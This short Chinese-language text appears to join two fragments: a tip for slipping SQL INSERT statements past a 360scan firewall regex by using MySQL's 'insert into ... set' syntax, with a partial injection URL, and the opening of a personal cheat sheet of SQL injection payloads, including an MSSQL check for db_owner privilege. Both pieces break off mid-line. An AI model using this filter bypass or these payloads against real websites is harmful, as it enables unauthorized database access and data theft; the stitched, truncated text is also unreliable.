360scan正則:INSERT\\s+INTO.+?VALUES
其實(shí)Mysql不只可以用insert into xxx values 插入數(shù)據(jù),還可以:insert into xxx set xx =
提交:
http://localhost/360.php?sql=insert into user (user,pass) values ('ad
我記性不好,所以把常用的注入代碼記錄下來(lái),有點(diǎn)亂,但對(duì)我來(lái)說(shuō),還算很有用,希望大家也會(huì)喜歡! //看看是什么權(quán)限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varch